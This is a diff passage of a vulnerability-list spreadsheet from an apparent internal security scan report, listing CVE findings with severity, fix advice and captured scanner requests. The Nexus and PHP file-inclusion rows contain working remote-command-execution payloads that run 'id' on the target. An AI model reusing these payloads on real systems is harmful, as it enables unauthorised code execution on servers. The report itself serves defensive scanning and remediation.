&gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X40" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y40" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr"/>
+      <c r="E41" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F41" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G41" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H41" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I41" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J41" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K41" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L41" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M41" t="inlineStr">
+        <is>
+          <t>192.168.51.66</t>
+        </is>
+      </c>
+      <c r="N41" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O41" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P41" t="inlineStr">
+        <is>
+          <t>子组名</t>
+        </is>
+      </c>
+      <c r="Q41" t="inlineStr"/>
+      <c r="R41" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S41" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T41" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U41" t="inlineStr"/>
+      <c r="V41" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W41" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X41" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y41" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr"/>
+      <c r="E42" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F42" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G42" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H42" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I42" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J42" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K42" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L42" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M42" t="inlineStr">
+        <is>
+          <t>192.168.54.213</t>
+        </is>
+      </c>
+      <c r="N42" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O42" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P42" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q42" t="inlineStr"/>
+      <c r="R42" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S42" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T42" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U42" t="inlineStr"/>
+      <c r="V42" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W42" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X42" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y42" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr"/>
+      <c r="E43" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F43" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G43" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H43" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I43" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J43" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K43" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L43" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M43" t="inlineStr">
+        <is>
+          <t>192.168.54.174</t>
+        </is>
+      </c>
+      <c r="N43" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O43" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P43" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q43" t="inlineStr"/>
+      <c r="R43" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S43" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T43" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U43" t="inlineStr"/>
+      <c r="V43" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W43" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X43" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y43" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>Nexus Repository Manager3远程命令执行漏洞(CVE-2018-16621)</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
+      <c r="E44" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018</t>
+        </is>
+      </c>
+      <c r="F44" t="inlineStr">
+        <is>
+          <t>Sonatype Nexus Repository Manager（NXRM）是美国Sonatype公司的一款Maven仓库管理器。</t>
+        </is>
+      </c>
+      <c r="G44" t="inlineStr">
+        <is>
+          <t>活跃漏洞</t>
+        </is>
+      </c>
+      <c r="H44" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I44" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J44" t="inlineStr">
+        <is>
+          <t>CVE-2018-16621</t>
+        </is>
+      </c>
+      <c r="K44" t="inlineStr">
+        <is>
+          <t>2026-07-10 18:44</t>
+        </is>
+      </c>
+      <c r="L44" t="inlineStr">
+        <is>
+          <t>2026-07-10 18:29</t>
+        </is>
+      </c>
+      <c r="M44" t="inlineStr">
+        <is>
+          <t>10.15.73.136</t>
+        </is>
+      </c>
+      <c r="N44" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O44" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P44" t="inlineStr"/>
+      <c r="Q44" t="inlineStr"/>
+      <c r="R44" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S44" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T44" t="inlineStr">
+        <is>
+          <t>8081</t>
+        </is>
+      </c>
+      <c r="U44" t="inlineStr">
+        <is>
+          <t>10.70.48.221:8081/service/extdirect/poll/rapture_State_get</t>
+        </is>
+      </c>
+      <c r="V44" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W44" t="inlineStr">
+        <is>
+          <t>页面url: 10.70.48.221:8081/service/extdirect/poll/rapture_State_get
+请求体: POST /service/extdirect/poll/rapture_State_get HTTP/1.1
+Host: 10.70.48.221:8081
+Connection: close
+Content-Length: 828
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.8271645154111453
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Origin: http://10.70.48.221:8081
+Referer: http://10.70.48.221:8081/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: stay_login=0; NX-ANTI-CSRF-TOKEN=0.8271645154111453; id=8MXOrymccWq3I1761ODN153600
+uiSettings=C:\'Wind'||'o'||'ws'|\System32\\#set ($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&amp;nexus.react.repositories=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;upload=5ffe533b830f08a0326348a9160afafc8ada44db&amp;acknowledgeAnalytics.required=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;nexus.datastore.enabled=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;allowScriptCreation=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;serverId=cb1e6abc50e960ea8058a665db6a203811c59d98&amp;rebuildingRepositories=97d170e1550eee4afc0af065b78cda302a97674c&amp;nexus.datastore.developer=7cb6efb98
+响应体: HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html;charset=utf-8
+Content-Length: 82
+C:\'Wind'||'o'||'ws'|\System32\\ 0 uid=8983(solr) gid=8983(solr) groups=8983(solr)</t>
+        </is>
+      </c>
+      <c r="X44" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y44" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>文件包含漏洞</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>文件包含</t>
+        </is>
+      </c>
+      <c r="E45" t="inlineStr">
+        <is>
+          <t>编辑源代码以确保正确验证了输入。 建议尽可能列出可接受的文件名列表，并将输入内容限制为该列表(白名单策略)。对于PHP，"allow_url_fopen"选项通常允许程序员使用URL(而不是本地文件路径)打开，包含或使用远程文件。 建议从php.ini中禁用此选项。</t>
+        </is>
+      </c>
+      <c r="F45" t="inlineStr">
+        <is>
+          <t>此脚本可能容易受到文件包含攻击,该脚本似乎可以包含一个文件，该文件的名称由用户提供的数据确定。 该数据在传递给包含函数之前未正确验证。</t>
+        </is>
+      </c>
+      <c r="G45" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H45" t="inlineStr">
+        <is>
+          <t>STA</t>
+        </is>
+      </c>
+      <c r="I45" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J45" t="inlineStr"/>
+      <c r="K45" t="inlineStr">
+        <is>
+          <t>2026-07-10 11:49</t>
+        </is>
+      </c>
+      <c r="L45" t="inlineStr">
+        <is>
+          <t>2026-07-10 11:49</t>
+        </is>
+      </c>
+      <c r="M45" t="inlineStr">
+        <is>
+          <t>10.128.160.30</t>
+        </is>
+      </c>
+      <c r="N45" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O45" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P45" t="inlineStr"/>
+      <c r="Q45" t="inlineStr"/>
+      <c r="R45" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S45" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T45" t="inlineStr">
+        <is>
+          <t>8080</t>
+        </is>
+      </c>
+      <c r="U45" t="inlineStr">
+        <is>
+          <t>192.168.180.222:8080/index.php?-d allow_url_include=on -d auto_prepend_file=php://input</t>
+        </is>
+      </c>
+      <c r="V45" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W45" t="inlineStr">
+        <is>
+          <t>页面url: 192.168.180.222:8080/index.php?-d allow_url_include=on -d auto_prepend_file=php://input
+请求体: POST //index.php?-d+allow_url_include=on+-d+auto_prepend_file=php://input HTTP/1.1
+Host: 192.168.180.222:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 31
+&lt;?php echo shell_exec("id"); ?&gt;
+响应体: HTTP/1.1 200 OK
+Date: Tue, 12 Nov 2019 13:14:29 GMT
+Server: Apache/2.4.10 (Debian)
+X-Powered-By: PHP/5.4.1
+Content-Length: 44
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+Hello, 
+Your name is &lt;strong&gt;Vulhub&lt;/strong&gt;</t>
+        </is>
+      </c>
+      <c r="X45" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y45" t="inlineStr">
+        <is>
+          <t>内网</t>
         </is>
       </c>
     </row>

--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -2645,7 +2645,7 @@
       </c>
       <c r="M16" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N16" t="inlineStr">
@@ -2660,7 +2660,7 @@
       </c>
       <c r="P16" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q16" t="inlineStr"/>
@@ -2921,12 +2921,12 @@
       </c>
       <c r="M18" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.54.174</t>
         </is>
       </c>
       <c r="N18" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O18" t="inlineStr">
@@ -2947,7 +2947,7 @@
       </c>
       <c r="S18" t="inlineStr">
         <is>
